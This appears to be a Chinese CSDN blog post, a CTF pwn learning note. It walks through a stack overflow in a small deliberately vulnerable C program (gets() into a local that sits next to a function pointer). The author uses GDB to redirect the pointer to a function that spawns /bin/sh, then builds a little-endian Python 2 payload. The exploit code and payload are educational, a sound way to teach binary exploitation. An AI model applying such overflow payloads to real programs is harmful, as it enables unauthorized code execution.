Pwn python发送不可见字符串——小端序

最新推荐文章于 2024-04-17 23:36:56 发布
最新推荐文章于 2024-04-17 23:36:56 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: Pwn 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/123949412
版权
本文介绍了通过GDB调试一个C程序,该程序存在栈溢出漏洞。通过输入特定数量的'a'字符,观察栈内存布局,并使用GDB设置内存值,将栈上的函数指针替换为`func`函数的地址,从而在执行时调用`func`来执行shell。调试过程中详细展示了如何修改内存以触发函数调用,揭示了64位系统的小端序问题。
摘要由CSDN通过智能技术生成

Pwn学习 python发送不可见字符串

1.源代码

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
char sh[] = "bin/sh";

int init_func(){
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);
    return 0;
}

int func(char *cmd){
    system(sh);
    return 0;
}

int main(){
    init_func();
    volatile int (*fp)();
    fp = 0;
    int a;
    // char a[8];
    // char b[8];
    puts("input:");
    gets(&a);
    // printf(a);
    if(fp){
        fp();
    }
    return 0;
}

2.编译

gcc question_3.c -no-pie -o question_3

3.gdb调试

gdb-peda$ disass main
Dump of assembler code for function main:
   0x000000000040076b <+0>:	push   rbp
   0x000000000040076c <+1>:	mov    rbp,rsp
   0x000000000040076f <+4>:	sub    rsp,0x20
   0x0000000000400773 <+8>:	mov    rax,QWORD PTR fs:0x28
   0x000000000040077c <+17>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000400780 <+21>:	xor    eax,eax
   0x0000000000400782 <+23>:	mov    eax,0x0
   0x0000000000400787 <+28>:	call   0x4006e7 <init_func>
   0x000000000040078c <+33>:	mov    QWORD PTR [rbp-0x10],0x0
   0x0000000000400794 <+41>:	lea    rdi,[rip+0xc9]        # 0x400864
   0x000000000040079b <+48>:	call   0x4005b0 <puts@plt>
   0x00000000004007a0 <+53>:	lea    rax,[rbp-0x14]
   0x00000000004007a4 <+57>:	mov    rdi,rax
   0x00000000004007a7 <+60>:	mov    eax,0x0
   0x00000000004007ac <+65>:	call   0x4005e0 <gets@plt>
   0x00000000004007b1 <+70>:	cmp    QWORD PTR [rbp-0x10],0x0
   0x00000000004007b6 <+75>:	je     0x4007c3 <main+88>
=> 0x00000000004007b8 <+77>:	mov    rdx,QWORD PTR [rbp-0x10]
   0x00000000004007bc <+81>:	mov    eax,0x0
   0x00000000004007c1 <+86>:	call   rdx
   0x00000000004007c3 <+88>:	mov    eax,0x0
   0x00000000004007c8 <+93>:	mov    rcx,QWORD PTR [rbp-0x8]
   0x00000000004007cc <+97>:	xor    rcx,QWORD PTR fs:0x28
   0x00000000004007d5 <+106>:	je     0x4007dc <main+113>
   0x00000000004007d7 <+108>:	call   0x4005c0 <__stack_chk_fail@plt>
   0x00000000004007dc <+113>:	leave  
   0x00000000004007dd <+114>:	ret    
End of assembler dump.
  • 可以看到在箭头处使用了call rdx
  • rdx是在上一行被赋值的
  • 我连续输入20个a后查看栈
gdb-peda$ x/20xg $rbp-0x20
0x7fffffffe4d0:	0x00000000004007e0	0x6161616100400600
0x7fffffffe4e0:	0x6161616161616161	0x6161616161616161
0x7fffffffe4f0:	0x0000000000400700	0x00007ffff7a03c87
0x7fffffffe500:	0x0000000000000001	0x00007fffffffe5d8
0x7fffffffe510:	0x0000000100008000	0x000000000040076b
0x7fffffffe520:	0x0000000000000000	0x3ecf204c5eb4e6c4
0x7fffffffe530:	0x0000000000400600	0x00007fffffffe5d0
0x7fffffffe540:	0x0000000000000000	0x0000000000000000
0x7fffffffe550:	0xc130df339b74e6c4	0xc130cf8c290ae6c4
0x7fffffffe560:	0x00007fff00000000	0x0000000000000000
gdb-peda$ p $rbp
$1 = (void *) 0x7fffffffe4f0
  • 那么程序会把0x7fffffffe4e0的位置当作函数指针
gdb-peda$ x/40b $rbp-0x20
0x7fffffffe4d0:	0xe0	0x07	0x40	0x00	0x00	0x00	0x00	0x00
0x7fffffffe4d8:	0x00	0x06	0x40	0x00	0x61	0x61	0x61	0x61
0x7fffffffe4e0:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0x7fffffffe4e8:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0x7fffffffe4f0:	0x00	0x07	0x40	0x00	0x00	0x00	0x00	0x00
  • 现在要把这个位置覆盖成func的函数地址
  • 使用set命令进行赋值
gdb-peda$ set *0x7fffffffe4e0=0
gdb-peda$ x/40b $rbp-20
0x7fffffffe4dc:	0x61	0x61	0x61	0x61	0x00	0x00	0x00	0x00
0x7fffffffe4e4:	0x61	0x61	0x61	0x61	0x61	0x61	0x61	0x61
0x7fffffffe4ec:	0x61	0x61	0x61	0x61	0x00	0x07	0x40	0x00
0x7fffffffe4f4:	0x00	0x00	0x00	0x00	0x87	0x3c	0xa0	0xf7
0x7fffffffe4fc:	0xff	0x7f	0x00	0x00	0x01	0x00	0x00	0x00
gdb-peda$ x/40xg $rbp-0x20
0x7fffffffe4d0:	0x00000000004007e0	0x6161616100400600
0x7fffffffe4e0:	0x6161616100000000	0x6161616161616161
0x7fffffffe4f0:	0x0000000000400700	0x00007ffff7a03c87
0x7fffffffe500:	0x0000000000000001	0x00007fffffffe5d8
0x7fffffffe510:	0x0000000100008000	0x000000000040076b
0x7fffffffe520:	0x0000000000000000	0x17fa4240ebe7e5f4
0x7fffffffe530:	0x0000000000400600	0x00007fffffffe5d0
0x7fffffffe540:	0x0000000000000000	0x0000000000000000
0x7fffffffe550:	0xe805bd3f2e27e5f4	0xe805ad809c59e5f4
0x7fffffffe560:	0x00007fff00000000	0x0000000000000000
0x7fffffffe570:	0x0000000000000000	0x00007ffff7de38d3
0x7fffffffe580:	0x00007ffff7dc9638	0x000000000e75740c
0x7fffffffe590:	0x0000000000000000	0x0000000000000000
0x7fffffffe5a0:	0x0000000000000000	0x0000000000400600
0x7fffffffe5b0:	0x00007fffffffe5d0	0x000000000040062a
0x7fffffffe5c0:	0x00007fffffffe5c8	0x000000000000001c
0x7fffffffe5d0:	0x0000000000000001	0x00007fffffffe7ff
0x7fffffffe5e0:	0x0000000000000000	0x00007fffffffe833
0x7fffffffe5f0:	0x00007fffffffee1f	0x00007fffffffee41
0x7fffffffe600:	0x00007fffffffee50	0x00007fffffffee61
gdb-peda$ set *0x7fffffffe4e4=0
gdb-peda$ x/40xg $rbp-0x20
0x7fffffffe4d0:	0x00000000004007e0	0x6161616100400600
0x7fffffffe4e0:	0x0000000000000000	0x6161616161616161
0x7fffffffe4f0:	0x0000000000400700	0x00007ffff7a03c87
0x7fffffffe500:	0x0000000000000001	0x00007fffffffe5d8
0x7fffffffe510:	0x0000000100008000	0x000000000040076b
0x7fffffffe520:	0x0000000000000000	0x17fa4240ebe7e5f4
0x7fffffffe530:	0x0000000000400600	0x00007fffffffe5d0
0x7fffffffe540:	0x0000000000000000	0x0000000000000000
0x7fffffffe550:	0xe805bd3f2e27e5f4	0xe805ad809c59e5f4
0x7fffffffe560:	0x00007fff00000000	0x0000000000000000
0x7fffffffe570:	0x0000000000000000	0x00007ffff7de38d3
0x7fffffffe580:	0x00007ffff7dc9638	0x000000000e75740c
0x7fffffffe590:	0x0000000000000000	0x0000000000000000
0x7fffffffe5a0:	0x0000000000000000	0x0000000000400600
0x7fffffffe5b0:	0x00007fffffffe5d0	0x000000000040062a
0x7fffffffe5c0:	0x00007fffffffe5c8	0x000000000000001c
0x7fffffffe5d0:	0x0000000000000001	0x00007fffffffe7ff
0x7fffffffe5e0:	0x0000000000000000	0x00007fffffffe833
0x7fffffffe5f0:	0x00007fffffffee1f	0x00007fffffffee41
0x7fffffffe600:	0x00007fffffffee50	0x00007fffffffee61
gdb-peda$ p &func
$2 = (<text variable, no debug info> *) 0x40074c <func>
gdb-peda$ set *0x7fffffffe4e0=0x40074c
gdb-peda$
  • 可以看到现在rdx已经被修改成了func的地址
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7dcda00 --> 0xfbad208b 
RDX: 0x40074c (<func>:	push   rbp)
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a 
RDI: 0x0 
RBP: 0x7fffffffe4f0 --> 0x400700 (<init_func+25>:	add    BYTE PTR [rax-0x77],cl)
RSP: 0x7fffffffe4d0 --> 0x4007e0 (<__libc_csu_init>:	push   r15)
RIP: 0x4007c1 (<main+86>:	call   rdx)
R8 : 0x7ffff7dcf8c0 --> 0x0 
R9 : 0x7ffff7fe04c0 (0x00007ffff7fe04c0)
R10: 0x3 
R11: 0x246 
R12: 0x400600 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe5d0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4007b6 <main+75>:	je     0x4007c3 <main+88>
   0x4007b8 <main+77>:	mov    rdx,QWORD PTR [rbp-0x10]
   0x4007bc <main+81>:	mov    eax,0x0
=> 0x4007c1 <main+86>:	call   rdx
   0x4007c3 <main+88>:	mov    eax,0x0
   0x4007c8 <main+93>:	mov    rcx,QWORD PTR [rbp-0x8]
   0x4007cc <main+97>:	xor    rcx,QWORD PTR fs:0x28
   0x4007d5 <main+106>:	je     0x4007dc <main+113>
No argument
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe4d0 --> 0x4007e0 (<__libc_csu_init>:	push   r15)
0008| 0x7fffffffe4d8 --> 0x6161616100400600 
0016| 0x7fffffffe4e0 --> 0x40074c (<func>:	push   rbp)
0024| 0x7fffffffe4e8 ("aaaaaaaa")
0032| 0x7fffffffe4f0 --> 0x400700 (<init_func+25>:	add    BYTE PTR [rax-0x77],cl)
0040| 0x7fffffffe4f8 --> 0x7ffff7a03c87 (<__libc_start_main+231>:	mov    edi,eax)
0048| 0x7fffffffe500 --> 0x1 
0056| 0x7fffffffe508 --> 0x7fffffffe5d8 --> 0x7fffffffe7ff ("/home/lwj/Desktop/git/ctf-pwn/question_3/question_3")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004007c1 in main ()
gdb-peda$
  • 继续执行程序就会跳转到shell
gdb-peda$ c
Continuing.
[New process 77144]
process 77144 is executing new program: /bin/dash   ==>这里显示已经开启了新进程
Warning:
Cannot insert breakpoint 2.
Cannot access memory at address 0x4007b8

gdb-peda$

4.payload

以下都是使用py2操作

payload = 'A' * 4 + '000000000040074c'
  • 要以字符型传入
payload = 'A' * 4 + '\x00\x00\x00\x00\x00\x40\x07\x4c'
  • 但是这个时候还是打不通的
  • 原因是我们没注意大小端序
  • 64位程序是小端序
  • 我手动操作换成小端序即可
payload = 'A' * 4 + '\x4c\x07\x40\x00\x00\x00\x00\x00'
  • 这就是小端序的问题
==Microsoft==
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
chatgpt赋能pythonPython中隐藏字符是什么,如何处理?——一位有10年Python编程经验工程师分享
suimodina的博客
06-01 670
隐藏字符指的是不可见字符,它们不会像空格、制表符、回车符、换行符等字符一样被直接显示出来,而是通过ASCII代码或Unicode代码表示。空格字符:它看起来像空格,但实际上不是空格。制表符:它看起来像空格,但实际上是一个水平制表符。空白符:它在文档中只占用空白,但在代码中会导致语法错误。零宽空格:它不占据任何宽度,但可以影响文本的呈现。回车符、换行符:它们分别用于表示文本的换行和行结束。这些隐藏字符Python编程中经常会出现,如果不注意处理会给我们的代码带来很多不便和麻烦。
Python中的诡异事:不可见字符
夏小悠的博客
08-12 624
今天分享一件很诡异的事情,我写代码的时候遇到了不可见的字符!!!
解决python中出现的不可见字符问题,OSError: [Errno 22] Invalid argument: ‘\u202a**.csv‘
囧疼她的博客
11-26 5117
解决python中出现的不可见字符问题,OSError: [Errno 22] Invalid argument: '\u202a**.csv'问题描述不可见控制字符解决方法 问题描述 今天遇到一个坑,读取文件时,在用到open函数时,始终报OSError: [Errno 22] Invalid argument:的错误,意思说文件路径错误。 pandas读取csv文件时,pandas自带open()运行报错误OSError: [Errno 22] Invalid argument: '\u202a**.c
python去除不可见字符,如:\u200b
田歌的博客
08-03 1926
对工作中遇到的不可见字符的去除,做一个记录 def remove_invisible_chars(s): """移除所有不可见字符,除\n外""" str = '' for x in s: if x is not '\n' and not x.isprintable(): str += '' else: str += x return str ...
Python如何打印隐形字符
weixin_38987932的博客
10-15 1786
data = “\r\n12345678\r\n” print(repr(data))
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
(转)大端法、小端法、网络字节序
iFeng
04-17 574
关于字节序(大端法、小端法)的定义 《UNXI网络编程》定义:术语“小端”和“大端”表示多字节值的哪一端(小端或大端)存储在该值的起始地址。小端存在起始地址,即是小端字节序;大端存在起始地址,即是大端字节序。也可以说: 1.小端法(Little-Endian)就是低位字节排放在内存的低地址端即该值的起始地址,高位字节排放在内存的高地址端。 2.大端法(Big-Endian)就是高位字节排放
命令参数输入不可见字符
怪囧小窝
03-29 3261
1、pwntools里有sendline 可以放任意字符 2、python -c "print 'A'*100+'\xa0\x12\x3d\x6f'" | ./testprogram
大端序和小端序
Sakura给爷pwn全场
08-29 221
大端字节序:高字节存于内存低地址,低字节存于内存高地址(高低,低高——反) 小端字节序:高字节存于内存高地址,低字节存于内存低地址(高高,低低——同) 大端序和小端序的详细描述链接 ...
使用Python BeautifulSoup爬取中文网页,编码为乱码或者不可见字符的解决方法
跬步Python股票数据量化分析
03-08 1739
使用Python BeautifulSoup爬取中文网页,编码为乱码或者不可见字符的解决方法 使用python做爬虫的时候,有时候爬下来的中文内容为乱码,该如何解决呢?一个比较简单解决方法,在使用request获取的html内容后,设定编码方式为'utf-8',然后在使用BeautifulSoup解析,如下: url = 'http://www.****acb.html' r = reque...
显示或隐藏不可见字符
m0_37443131的博客
07-24 1万+
显示 默认情况下,vim是不会显示tab等其他分隔符的,要显示的话可通过以下命令实现: 方法1: :set list 方法2: 在命令后面加 | less   ================================================== 隐藏 方法: :set nolist...
python3 base64解码_Python2/3 的 base64 对不可见字符编码结果不同
weixin_39612733的博客
12-05 309
两个完全相同的.py,分别是 2 和 3:# py2import base64c = base64.b64decode('U/osUbnY8nSrWz4WPwKSwWPzKq9tOIQ9eCWnN5E+')plain = '{"name":"guest","admin":false}'res = ''for i in range(len(c)):res += chr(ord(c[i]) ^ ord...
pwn程序已经运行了,payload字节数组包含不可见字符,无法进行utf8编码,这个时候怎么输入?
最新发布
键盘的起始页
04-17 959
如果你想要使用 Python 脚本向一个已经运行的程序发送包含不可见字符的 payload,你需要确保你有一种方法来将 Python 脚本的输出重定向到该程序的输入。如果你的程序已经在运行,并且你可以使用 GDB 附加到进程,那么你可以使用 GDB 来修改内存或者调用函数来发送你的 payload。在实践中,如果你没有权限或者无法确定程序的 PID,或者程序不是从标准输入读取数据,你可能需要考虑使用其他的方法(比如 GDB 或者修改程序的运行方式来接受来自特定管道或文件的输入)。目录下的文件描述符来写入。
ROP-基础-ret2text
ATFWUS的博客
02-28 736
文件下载地址: 链接:https://pan.baidu.com/s/1_zJ6U5QYokpjSiYLjiM3iA 提取码:gqrc 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabl...
Python去除不可见字符,如\u200b
热门推荐
XerCis的博客
07-27 1万+
利用 str.isprintable() ,如果字符串中所有字符均为可打印字符或空字符串则返回True ,否则返回False
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值